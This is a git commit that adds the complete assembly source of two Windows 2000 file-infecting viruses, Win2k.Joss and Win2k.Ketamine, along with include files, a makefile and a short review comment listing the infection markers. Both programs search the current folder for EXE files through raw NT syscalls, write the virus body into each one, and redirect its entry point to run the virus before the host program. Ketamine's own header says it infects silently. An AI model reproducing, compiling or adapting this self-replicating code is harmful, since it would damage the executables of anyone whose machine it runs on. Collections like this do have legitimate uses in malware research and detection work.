Folder structure change, added README

TheDuchy
2020-10-16 22:28:58 +02:00
parent 2114d4f5e7
commit d44d9b59a7
174 changed files with 14378 additions and 0 deletions
+715
@@ -0,0 +1,715 @@
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[JOSS.ASM]ÄÄÄ
; Win2k.Joss by Ratter/29A
.586p
.model flat, stdcall
locals
include useful.inc
include win32api.inc
include mz.inc
include pe.inc
include my_macroz.inc
NtOpenFile equ 64h
NtQueryDirectoryFile equ 7dh
NtClose equ 18h
NtCreateSection equ 2bh
NtMapViewOfSection equ 5dh
NtUnmapViewOfSection equ 0e7h
unicode_string struc
us_length dw ?
dw ?
us_pstring dd ?
unicode_string ends
path_name struc
pn_name dw MAX_PATH dup(?)
path_name ends
object_attributes struc
oa_length dd ?
oa_rootdir dd ?
oa_objectname dd ?
oa_attribz dd ?
oa_secdesc dd ?
oa_secqos dd ?
object_attributes ends
pio_status_block struc
psb_ntstatus dd ?
psb_info dd ?
pio_status_block ends
@asciiz_to_unicode macro
xor ah, ah
lodsb
stosw
test al, al
jz $+4
jmp $-7
endm
@syscall macro fc, paramz
mov eax, fc
mov edx, esp
int 2eh
add esp, (paramz*4)
endm
.data
db ?
.code
start_:
_joss_start_ equ $
pushad
@SEH_SetupFrame <jmp joss_end>
bt dword ptr [esp+8+cPushad], 31
jc joss_end
start proc near
local trailings:unicode_string
local trailings_point_dir:path_name
local object_attribz:object_attributes
local dhandle:DWORD
local io_status_block:pio_status_block
local find_buffer:path_name
local wfnd:WIN32_FIND_DATA
mov dword ptr [trailings], 80008h
lea eax, [trailings_point_dir]
mov dword ptr [trailings.us_pstring], eax
@pushsz "\??\"
pop esi
xchg eax, edi
@asciiz_to_unicode
xor ecx, ecx
mov esi, 20290h
movzx eax, word ptr [trailings]
lea edi, [trailings_point_dir+eax]
lodsw
test ax, ax
jz $+7
inc ecx
stosw
jmp $-10
shl ecx, 1
add cx, word ptr [trailings]
mov ax, cx
shl ecx, 16
mov cx, ax
mov dword ptr [trailings], ecx
xor eax, eax
lea edi, [object_attribz]
push edi
push 18h/4
pop ecx
rep stosd
pop edi
push 18h
pop dword ptr [edi]
lea eax, [trailings]
mov dword ptr [edi+8], eax
push 40h
pop dword ptr [edi+12]
push 4021h
push 03h
lea eax, [io_status_block]
push eax
push edi
push 100001h
lea eax, [dhandle]
push eax
@syscall NtOpenFile, 6
mov ebx, dword ptr [dhandle]
xor ecx, ecx
main_loop:
push ecx
xor eax, eax
push eax
call $+13
dw 0ah
dw 0ah
dd ?
pop esi
call $+15
dw '<', '.', 'e', 'x', 'e'
pop edi
mov dword ptr [esi+4], edi
jecxz $+4
xor esi, esi
push esi
push 1
push 3
push MAX_PATH*2
lea edx, [find_buffer]
push edx
lea edx, [io_status_block]
push edx
push eax
push eax
push eax
push ebx
@syscall NtQueryDirectoryFile, 11
pop ecx
test eax, eax
jnz main_loop_end
push dword ptr [trailings]
lea esi, [find_buffer]
lea edi, [trailings]
call infect_file
pop dword ptr [trailings]
inc ecx
jmp main_loop
main_loop_end:
push ebx
@syscall NtClose, 1
leave
joss_end:
@SEH_RemoveFrame
popad
mov eax, offset end
host_start equ $-4
jmp eax
db 0, "[Win2k.Joss] by Ratter/29A", 0
infect_file proc near
local trailings_point_dir:path_name
local object_attribz:object_attributes
local dhandle:DWORD
local shandle:DWORD
local io_status_block:pio_status_block
local soffset:DWORD
local bytes:DWORD
local soffset_:QWORD
pushad
@SEH_SetupFrame <jmp infect_file_end>
movzx eax, word ptr [edi]
mov edx, dword ptr [edi+4]
push edi
lea edi, [edx+eax]
mov ecx, dword ptr [esi+3ch]
push ecx
lea esi, [esi+5eh]
rep movsb
pop ecx
pop edi
add cx, word ptr [edi]
mov ax, cx
shl ecx, 16
mov cx, ax
mov dword ptr [edi], ecx
xchg edi, esi
xor eax, eax
lea edi, [object_attribz]
push edi
push 18h/4
pop ecx
rep stosd
pop edi
push 18h
pop dword ptr [edi]
mov dword ptr [edi+8], esi
push 40h
pop dword ptr [edi+12]
push 4060h
push 03h
lea eax, [io_status_block]
push eax
push edi
push 100007h
lea eax, [dhandle]
push eax
@syscall NtOpenFile, 6
test eax, eax
jnz infect_file_end
xor eax, eax
push dword ptr [dhandle]
push 08000000h
push PAGE_READWRITE
push eax
push eax
push 0f0007h
lea eax, [shandle]
push eax
@syscall NtCreateSection, 7
test eax, eax
jnz infect_file_end_close_file
lea edi, [soffset]
std
mov ecx, 4
xor eax, eax
rep stosd
cld
xor eax, eax
push 4
push eax
push 1
lea edx, [bytes]
push edx
lea edx, [soffset_]
push edx
push eax
push eax
lea eax, [soffset]
push eax
push -1
push dword ptr [shandle]
@syscall NtMapViewOfSection, 10
test eax, eax
jnz infect_file_end_close_section
mov ebx, dword ptr [soffset]
;
call check_for_valid_pe
jc infect_file_end_unmap_view
jnz infect_file_end_unmap_view
cmp dword ptr [ebx.MZ_res], not "RAT"
jz infect_file_end_unmap_view
mov eax, dword ptr [ebx.MZ_lfanew]
add eax, ebx
movzx edi, word ptr [eax.NT_FileHeader.FH_SizeOfOptionalHeader]
lea edi, [edi+eax+IMAGE_SIZEOF_FILE_HEADER+4]
mov esi, dword ptr [edi.SH_PointerToRawData]
mov ecx, dword ptr [edi.SH_SizeOfRawData]
add esi, ebx
xor edx, edx
gap_loop:
jecxz gap_loop_end
lodsb
dec ecx
call is_gap
jz $+6
xor edx, edx
jmp gap_loop
inc edx
cmp edx, _joss_end_-_joss_start_
jnz gap_loop
gap_loop_end:
cmp edx, _joss_end_-_joss_start_
jnz infect_file_end_unmap_view
sub esi, _joss_end_-_joss_start_
push esi
sub esi, dword ptr [edi.SH_PointerToRawData]
pop edi
sub esi, ebx
push esi
call $+5
joss_here:
pop esi
sub esi, joss_here-_joss_start_
mov ecx, _joss_end_-_joss_start_
rep movsb
pop esi
mov eax, dword ptr [ebx.MZ_lfanew]
mov dword ptr [ebx.MZ_res], not "RAT"
add eax, ebx
and dword ptr [eax.NT_OptionalHeader.OH_CheckSum], 0
mov ecx, dword ptr [eax.NT_OptionalHeader.OH_ImageBase]
add ecx, dword ptr [eax.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov dword ptr [edi-(_joss_end_-host_start)], ecx
mov edx, dword ptr [eax.NT_OptionalHeader.OH_BaseOfCode]
add edx, esi
mov dword ptr [eax.NT_OptionalHeader.OH_AddressOfEntryPoint], edx
;
infect_file_end_unmap_view:
push ebx
push -1
@syscall NtUnmapViewOfSection, 2
infect_file_end_close_section:
push dword ptr [shandle]
@syscall NtClose, 1
infect_file_end_close_file:
push dword ptr [dhandle]
@syscall NtClose, 1
infect_file_end:
@SEH_RemoveFrame
popad
leave
retn
infect_file endp
check_for_valid_pe:
pushad
movzx eax, word ptr [ebx]
not eax
cmp eax, not "ZM"
stc
jnz check_for_valid_pe_end
mov edx, dword ptr [ebx.MZ_lfanew]
add edx, ebx
movzx eax, word ptr [edx]
not eax
cmp eax, not "EP"
stc
jnz check_for_valid_pe_end
cmp word ptr [edx.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
stc
jnz check_for_valid_pe_end
movzx eax, word ptr [edx.NT_FileHeader.FH_Characteristics]
not al
test eax, IMAGE_FILE_EXECUTABLE_IMAGE or IMAGE_FILE_DLL
clc
check_for_valid_pe_end:
popad
retn
is_gap:
cmp al, 90h
jz is_gap_end
cmp al, 0cch
jz is_gap_end
test al, al
jz is_gap_end
is_gap_end:
retn
_joss_end_ equ $
end:
push 0
calle ExitProcess
start endp
end start_
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[JOSS.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[JOSS.DEF]ÄÄÄ
NAME PREDLOHA WINDOWAPI
DESCRIPTION 'Predloha'
CODE PRELOAD MOVEABLE DISCARDABLE
DATA PRELOAD MOVEABLE MULTIPLE
EXETYPE WINDOWS
HEAPSIZE 131072
STACKSIZE 131072
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[JOSS.DEF]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[my_include.inc]ÄÄÄ
SERVICE_TABLE_ENTRY struc
STE_ServiceName dd ?
STE_ServiceProc dd ?
SERVICE_TABLE_ENTRY ends
SERVICE_STATUS struc
SS_ServiceType dd ?
SS_CurrentState dd ?
SS_ControlsAccepted dd ?
SS_Win32ExitCode dd ?
SS_ServiceSpecificExitCode dd ?
SS_CheckPoint dd ?
SS_WaitHint dd ?
SERVICE_STATUS ends
OVERLAPPED struc
O_Internal dd ?
O_InternalHigh dd ?
O_loffset dd ?
O_OffsetHigh dd ?
O_hEvent dd ?
OVERLAPPED ends
sockaddr_in struc
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup (?)
sockaddr_in ends
hostent struc
h_name dd ?
h_alias dd ?
h_addr dw ?
h_len dw ?
h_list dd ?
hostent ends
timeval struc
tv_sec dd ?
tv_usec dd ?
timeval ends
fd_set struc
fd_count dd ?
fd_array dd ?
fd_set ends
RASCONNSTATUSA struc
RCS_dwSize dd ?
RCS_rasconnstate dd ?
RCS_dwError dd ?
RCS_szDeviceType db 16 + 1 dup(?)
RCS_szDeviceName db 128 + 1 dup(?)
RASCONNSTATUSA ends
_email_ struc
EM_MailFrom dd ? ; pointer to ASCIIZ
EM_RcptTo dd ? ; pointer to ASCIIZ
EM_Subject dd ? ; pointer to ASCIIZ
EM_Message dd ? ; pointer to ASCIIZ
EM_FilezNum dd ? ; number of filez; if highest bit is set
; then in EM_Filez is a *.msg file
EM_Filez dd ? ; pointer to ASCIIZ pointerz
_email_ ends
SYSTEMTIME struc
ST_Year dw ?
ST_Month dw ?
ST_DayOfWeek dw ?
ST_Day dw ?
ST_Hour dw ?
ST_Minute dw ?
ST_Second dw ?
ST_Milliseconds dw ?
SYSTEMTIME ends
oper struc
OP_Oper dd ?
OP_Rites db ? ; 1 - RW; 0 - Ronly
oper ends
@copy macro source
local copy_end
local copy_loop
push esi
mov esi, source
copy_loop:
lodsb
test al, al
jz copy_end
stosb
jmp copy_loop
copy_end:
pop esi
endm
@endsz_ macro
local nxtchr
push esi
mov esi, edi
nxtchr:
lodsb
test al, al
jnz nxtchr
xchg esi, edi
pop esi
endm
@pushvar macro variable, empty
local next_instr
ifnb <empty>
%out too much arguments in macro '@pushvar'
.err
endif
call next_instr
variable
next_instr:
endm
CR_LF equ 0a0dh
WAIT_TIMEOUT equ 103h
SMTP_PORT equ 25
SC_MANAGER_CONNECT equ 1
SC_MANAGER_CREATE_SERVICE equ 2
DELETE equ 10000h
SERVICE_AUTO_START equ 2
SERVICE_WIN32_OWN_PROCESS equ 10h
SERVICE_ACCEPT_SHUTDOWN equ 4
SERVICE_CONTROL_RUN equ 0
CK_SERVICE_CONTROL equ 0
CK_PIPE equ 1
NO_ERROR equ 0
SERVICE_CONTROL_INTERROGATE equ 4
SERVICE_CONTROL_SHUTDOWN equ 5
SERVICE_STOPPED equ 1
SERVICE_START_PENDING equ 2
SERVICE_STOP_PENDING equ 3
SERVICE_RUNNING equ 4
SERVICE_CONTINUE_PENDING equ 5
SERVICE_PAUSE_PENDING equ 6
SERVICE_PAUSED equ 7
PIPE_ACCESS_OUTBOUND equ 2
PIPE_TYPE_BYTE equ 0
FILE_FLAG_OVERLAPPED equ 40000000h
INFINITE equ -1
AF_INET equ 2
HEAP_ZERO_MEMORY equ 8
SOCK_STREAM equ 1
CR_LF equ 0a0dh
MAX_ALLOWED_OPERZ equ 5
SYNCHRONIZE equ 100000h
RASCS_CONNECTED equ 2000h
MOVEFILE_DELAY_UNTIL_REBOOT equ 4
HKEY_LOCAL_MACHINE equ 80000002h
KEY_ENUMERATE_SUB_KEYS equ 8h
HKEY_USERS equ 80000003h
KEY_QUERY_VALUE equ 1
KEY_SET_VALUE equ 2
REG_SZ equ 1
REG_DWORD equ 4
ERROR_NO_MORE_ITEMS equ 259
INET_THREADZ_COUNT equ 2
INTERNET_OPEN_TYPE_DIRECT equ 1
POP3_PORT equ 110
OK equ " KO+"
ERROR equ "RRE-"
SOXZ_PORT equ 1080
STARTUPINFO STRUCT ;used by CreateProcessA API
cb DWORD ?
lpReserved DWORD ?
lpDesktop DWORD ?
lpTitle DWORD ?
dwX DWORD ?
dwY DWORD ?
dwXSize DWORD ?
dwYSize DWORD ?
dwXCountChars DWORD ?
dwYCountChars DWORD ?
dwFillAttribute DWORD ?
dwFlags DWORD ?
wShowWindow WORD ?
cbReserved2 WORD ?
lpReserved2 DWORD ?
hStdInput DWORD ?
hStdOutput DWORD ?
hStdError DWORD ?
STARTUPINFO ENDS
PROCESS_INFORMATION STRUCT
hProcess DWORD ?
hThread DWORD ?
dwProcessId DWORD ?
dwThreadId DWORD ?
PROCESS_INFORMATION ENDS
GMEM_ZEROINIT equ 040h
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[my_include.inc]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[my_macroz.inc]ÄÄÄ
@pushvar macro variable, empty
local next_instr
ifnb <empty>
%out too much arguments in macro '@pushvar'
.err
endif
call next_instr
variable
next_instr:
endm
@messagebox macro message, empty
ifnb <empty>
%out too much arguments in macro '@pushvar'
.err
endif
push 0
@pushsz "Debug"
@pushsz <message>
push 0
call MessageBoxA
endm
calle macro api
extrn api:PROC
call api
endm
@gimme_delta macro
local gimme_delta
call gimme_delta
gimme_delta:
mov esi, esp
lodsd
sub eax, offset gimme_delta
xchg eax, ebp
mov esp, esi
endm
calla macro api
call dword ptr [ebp+api]
endm
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[my_macroz.inc]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKEFILE]ÄÄÄ
# make Will build pemangle.exe
# make -B -DDEBUG Will build the debug version of pemangle.exe
NAME = joss
OBJS = $(NAME).obj
DEF = $(NAME).def
!if $d(DEBUG)
TASMDEBUG=/zi /m
LINKDEBUG=/v
!else
TASMDEBUG=/m
LINKDEBUG=
!endif
!if $d(MAKEDIR)
IMPORT=import32.lib # Edit this to point your own library path
!else
IMPORT=import32.lib # or put the file in the same directory
!endif
$(NAME).EXE: $(OBJS) $(DEF)
tlink32 /Tpe /aa /c /x $(LINKDEBUG) $(OBJS),$(NAME),, $(IMPORT), $(DEF)
pewrite.exe $(NAME).exe
del $(OBJS)
.asm.obj:
tasm32 $(TASMDEBUG) /ml /i..\..\includes $&.asm
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKEFILE]ÄÄÄ
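Review bot: The on-disk artefacts this sample leaves are not documented anywhere in the bundle, although they are the part a detection-minded reader needs most: `cmp dword ptr [ebx.MZ_res], not "RAT"` / `mov dword ptr [ebx.MZ_res], not "RAT"` use the reserved field of the MZ header as the already-infected mark, `and dword ptr [eax.NT_OptionalHeader.OH_CheckSum], 0` zeroes the PE checksum, the entry point is redirected into a run of 90h/CCh/00h filler bytes found in the first section's raw data (gap_loop with is_gap), and the ASCII tag `[Win2k.Joss] by Ratter/29A` is carried in the body. A header comment in JOSS.ASM listing these, e.g. `; Artefacts: MZ e_res marker, zeroed CheckSum, AEP inside first-section filler, ASCII tag`, would let the file serve as a reference sample without reading the routine. The `NtOpenFile equ 64h` ... `NtUnmapViewOfSection equ 0e7h` constants at the top are fixed service numbers, so the sample is tied to the single NT build they were taken from; the header should say so, since the Ketamine file later in this commit explicitly contrasts itself on that point.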
+547
@@ -0,0 +1,547 @@
COMMENT#
Ú¿
ÃÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅ´
ÃÅÅÅÅÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÅÅÅÅ´
ÃÅÅÅ´ Win2k.Ketamine ÃÅÅÅ´
ÃÅÅÅ´ by Benny/29A ÃÅÅÅ´
ÃÅÅÅÅÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÅÅÅÅ´
ÃÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅ´
ÀÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÙ
This is my next (very small) virus, specialised on Win2k machinez. It should be also
able to run under WinNT machinez, but I'm not sure, becoz I didn't test it. The virus
does not use any APIz, instead of that, its uses NT syscallz. The virus does not do
anything special apart of that, it can only infect all EXE filez in current folder
and does not manifest itself in any way. Infected filez have the same size, becoz
virus overwritez the relocation section. The virus should be compatible with newer
versionz of Windows OS'ez based on NT system. The only point of incompatibility is,
becoz I decided to not use ANY API, the code where the virus expect the fixed address
of NTDLL.dll modul loaded in process virtual memory. Virus searchez inside the NTDLL.dll
for syscall numberz and so it SHOULD be forward compatible. At least a bit...;-)
Here I have to thank Ratter, he inspired me a lot with his Win2k.Joss. The functionality
of Win2k.Ketamine and Win2k.Joss is almost the same, I only recoded some of his code on my
own and added a few new ideaz, which should make Ketamine more compatible with Windows,
rather than Joss. I have to say, that he inspired me a lot, but the code is not ripped. I
also disassembled NTDLL.dll and NTOSKRNL.EXE and found the same resultz as him, surprisely ;-D
But ofcoz, I decided to not discover the America again and so I used some of his code in
my virus.
The virus was coded only to show that something is possible, not to make high-spreading virus.
Enjoy it!
(c)oded in August, 2001
Czech Republic.
#
.386p
.model flat,stdcall
locals
include win32api.inc
include useful.inc
include mz.inc
include pe.inc
invoke macro api ;macro for API callz
extrn api:PROC
call api
endm
unicode_string struc
us_length dd ? ;length of the string
us_pstring dd ? ;ptr to string
unicode_string ends
path struc
p_path dw MAX_PATH dup (?) ;maximal length of path in unicode
path ends
object_attributes struc
oa_length dd ? ;length of structure
oa_rootdir dd ?
oa_objectname dd ? ;name of object
oa_attribz dd ? ;attributez of the object
oa_secdesc dd ?
oa_secqos dd ?
object_attributes ends
pio_status struc ;status structure
ps_ntstatus dd ?
ps_info dd ?
pio_status ends
.data
db ? ;some data
.code
_Start: pushad
gdelta = $+5 ;delta offset
@SEH_SetupFrame <jmp end_seh>
mov edx,cs
xor dl,dl
jne end_seh ;must be under winNT/2k!
mov ebp,[esp+4]
call get_syscalls ;get numberz of all needed syscallz
Start Proc
local uni_string:unicode_string
local u_string:path
local object_attr:object_attributes
local io_status:pio_status
local dHandle:DWORD
local WFD:WIN32_FIND_DATA
mov [uni_string.us_length],80008h ;length of the string
lea edi,[u_string]
mov [uni_string.us_pstring],edi ;set the pointer
call @qm
dw '\','?','?','\' ;initial string of the object
@qm: pop esi
movsd
movsd ;save it
mov esi,fs:[18h]
mov esi,[esi+30h]
mov esi,[esi+10h]
add esi,24h
mov esi,[esi+4] ;ESI = current folder
xor ecx,ecx
l_copy: lodsw
inc ecx
stosw ;append it
test eax,eax
jne l_copy
dec ecx
lea edi,[uni_string]
shl ecx,1
add cx,[edi]
mov ax,cx
shl ecx,16
mov cx,ax
mov [edi],ecx ;save the new length
xor ecx,ecx ;initialize the structure ...
lea eax,[uni_string]
lea edi,[object_attr]
mov [edi.oa_length],24
and [edi.oa_rootdir],ecx
mov [edi.oa_objectname],eax
mov [edi.oa_attribz],40h
and [edi.oa_secdesc],ecx
and [edi.oa_secqos],ecx
push 4021h
push 3h
lea eax,[io_status]
push eax
push edi
push 100001h
lea ebx,[dHandle]
push ebx
call NtOpenFile ;open the current folder
mov ebx,[ebx]
xor ecx,ecx
f_loop: push ecx
xor eax,eax
push eax
call @p1
dd 0A000Ah ;length of the string
dd ? ;ptr to string
@p1: pop esi
call @exe
dw '<','.','E','X','E' ;string
@exe: pop dword ptr [esi+4] ;save the ptr
jecxz @1st
xor esi,esi
@1st: push esi
push 1
push 3
push MAX_PATH*2
lea edx,[WFD]
push edx
lea edx,[io_status]
push edx
push eax
push eax
push eax
push ebx
mov eax,12345678h
NtQDF = dword ptr $-4
lea edx,[esp]
int 2Eh ;NtQueryDirectoryFile
add esp,4*11 ;correct the stack
pop ecx
test eax,eax
jne e_loop ;quit if no more file
push dword ptr [uni_string] ;save the length
lea esi,[WFD] ;WIN32_FIND_DATA structure
lea edi,[uni_string] ;the filename
call infect_file ;infect the file
pop dword ptr [uni_string] ;restore the length
inc ecx
jmp f_loop ;find next file
e_loop: push ebx
call NtClose ;close the directory
leave
end_seh:@SEH_RemoveFrame
popad
extrn ExitProcess:PROC
push cs
push offset ExitProcess
original_ep = dword ptr $-4
retf ;jump to host!
Start EndP
NtClose:mov eax,12345678h
NtC = dword ptr $-4
lea edx,[esp+4]
int 2Eh ;close the handle
ret 4
NtOpenFile:
mov eax,12345678h
NtOF = dword ptr $-4
lea edx,[esp+4]
int 2Eh ;open the object
ret 4*6
infect_file Proc
local object_attr:object_attributes
local io_status:pio_status
local fHandle:DWORD
local sHandle:DWORD
local sOffset:DWORD
local bytez:DWORD
local sOffset2:QWORD
pushad
@SEH_SetupFrame <jmp if_end>
movzx edx,word ptr [edi]
add edx,[edi+4]
push edi
mov edi,edx ;EDI - end of string
mov ecx,[esi+3Ch] ;size of filename
push ecx
lea esi,[esi+5Eh] ;filename
rep movsb ;copy the string
pop ecx
pop edi
add cx,[edi]
mov ax,cx
shl ecx,16
mov cx,ax
mov [edi],ecx ;size of path+filename
xchg eax,edi
xor ecx,ecx ;initialize the structure...
lea edi,[object_attr]
mov [edi.oa_length],24
and [edi.oa_rootdir],ecx
mov [edi.oa_objectname],eax
mov [edi.oa_attribz],40h
and [edi.oa_secdesc],ecx
and [edi.oa_secqos],ecx
push 4060h
push 3h
lea ecx,[io_status]
push ecx
push edi
push 100007h
lea ebx,[fHandle]
push ebx
call NtOpenFile ;open the file
test eax,eax
jne if_end
mov ebx,[ebx]
xor eax,eax
push ebx
push 8000000h
push PAGE_READWRITE
push eax
push eax
push 0F0007h
lea ebx,[sHandle]
push ebx
mov eax,12345678h
NtCS = dword ptr $-4
mov edx,esp
int 2Eh ;NtCreateSection
add esp,4*7 ;correct stack
test eax,eax
jne if_end2
mov ebx,[ebx]
lea edx,[bytez] ;initialize some variablez
xor eax,eax
and [sOffset],eax
and [edx],eax
and dword ptr [sOffset2],eax
and dword ptr [sOffset2+4],eax
push 4
push eax
push 1
push edx
lea edx,[sOffset2]
push edx
push eax
push eax
lea esi,[sOffset]
push esi
push -1
push ebx
mov eax,12345678h
NtMVOS = dword ptr $-4
mov edx,esp
int 2Eh ;NtMapViewOfSection
add esp,4*10
test eax,eax
jne if_end3
mov ebx,[esi] ;EBX = start of memory-mapped file
mov esi,[ebx.MZ_lfanew]
add esi,ebx
mov eax,[esi]
add eax,-IMAGE_NT_SIGNATURE
jne if_end4 ;must be PE file
;discard not_executable and system filez
cmp word ptr [esi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
jne if_end4
mov ax,[esi.NT_FileHeader.FH_Characteristics]
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
je if_end4
test ax,IMAGE_FILE_DLL
jne if_end4
test ax,IMAGE_FILE_SYSTEM
jne if_end4
mov al,byte ptr [esi.NT_FileHeader.OH_Subsystem]
test al,IMAGE_SUBSYSTEM_NATIVE
jne if_end4
movzx eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
dec eax
test eax,eax
je if_end4
imul eax,eax,IMAGE_SIZEOF_SECTION_HEADER
movzx edx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
lea edi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
add edi,esi
lea edx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
mov eax,[edx]
test eax,eax
je if_end4
cmp eax,[edi.SH_VirtualAddress]
jne if_end4
cmp [edi.SH_SizeOfRawData],virus_end-_Start
jb if_end4 ;is it large enough?
pushad
xor eax,eax
mov edi,edx
stosd
stosd
popad ;erase relocs record
;align the section size
mov eax,virus_end-_Start
cmp eax,[edi.SH_VirtualSize]
jb o_vs
mov ecx,[esi.NT_OptionalHeader.OH_SectionAlignment]
cdq
div ecx
test edx,edx
je o_al
inc eax
o_al: mul ecx
mov [edi.SH_VirtualSize],eax
o_vs: push ebp ;save EBP
call idelta ;get delta offset
idelta: pop ebp
push dword ptr [ebp + original_ep - idelta]
mov eax,[esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
push dword ptr [edi.SH_VirtualAddress]
pop dword ptr [esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov [ebp + original_ep - idelta],eax
mov eax,[esi.NT_OptionalHeader.OH_ImageBase]
add [ebp + original_ep - idelta],eax
;set saved_entrypoint variable
pushad
mov edi,[edi.SH_PointerToRawData]
add edi,ebx
lea esi,[ebp + _Start - idelta]
mov ecx,(virus_end-_Start+3)/4
rep movsd ;overwrite relocs by virus body
popad
pop dword ptr [ebp + original_ep - idelta]
;restore used variablez
or dword ptr [edi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
pop ebp ;restore EBP
if_end4:push ebx
push -1
mov eax,12345678h
NtUVOS = dword ptr $-4
mov edx,esp
int 2Eh ;NtUnmapViewOfSection
add esp,4*2
if_end3:push [sHandle]
call NtClose ;close the section
if_end2:push [fHandle]
call NtClose ;close the file
if_end: @SEH_RemoveFrame
popad
ret
infect_file EndP
get_syscalls Proc
mov esi,77F80000h ;base of NTDLL.dll
mov edx,[esi.MZ_lfanew]
add edx,esi
mov ebx,[edx.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
add ebx,esi
mov ecx,[ebx.ED_NumberOfNames]
mov edx,[ebx.ED_AddressOfNames]
add edx,esi
xor eax,eax
c_find: pushad
add esi,[edx+eax*4]
push esi
@endsz
mov edi,esi
pop esi
sub edi,esi
call CRC32 ;calculate CRC32 of the API
push 6 ;number of syscallz
pop ecx
call @callz
dd 09ECA4E0Fh ;NtOpenFile
dd 0D5494178h ;NtQueryDirectoryFile
dd 0B964B7BEh ;NtClose
dd 03F2482E6h ;NtCreateSection
dd 010710614h ;NtMapViewOfSection
dd 0864CF09Bh ;NtUnmapViewOfSection
@callz: pop edx
c_look: cmp [edx-4+(ecx*4)],eax
je got_call
loop c_look
c_out: popad
inc eax
loop c_find
ret
got_call:
mov edx,[ebx.ED_AddressOfOrdinals]
mov esi,[esp.Pushad_esi]
add edx,esi
mov eax,[esp.Pushad_eax]
movzx eax,word ptr [edx+eax*2]
mov edx,esi
add edx,[ebx.ED_AddressOfFunctions]
mov eax,[edx+eax*4]
add eax,esi
mov eax,[eax+1] ;get number of the syscall
lea edx,[ebp + _Start - gdelta]
add edx,[ebp + sys_addr-4+ecx*4 - gdelta]
mov [edx],eax ;save it
jmp c_out
get_syscalls EndP
sys_addr: ;where to save syscall numberz...
dd offset NtOF-_Start
dd offset NtQDF-_Start
dd offset NtC-_Start
dd offset NtCS-_Start
dd offset NtMVOS-_Start
dd offset NtUVOS-_Start
CRC32: push ecx ;procedure for calculating CRC32s
push edx ;at run-time
push ebx
xor ecx,ecx
dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
ret
signature db 0,'WinNT.Ketamine by Benny/29A',0
virus_end:
End _Start
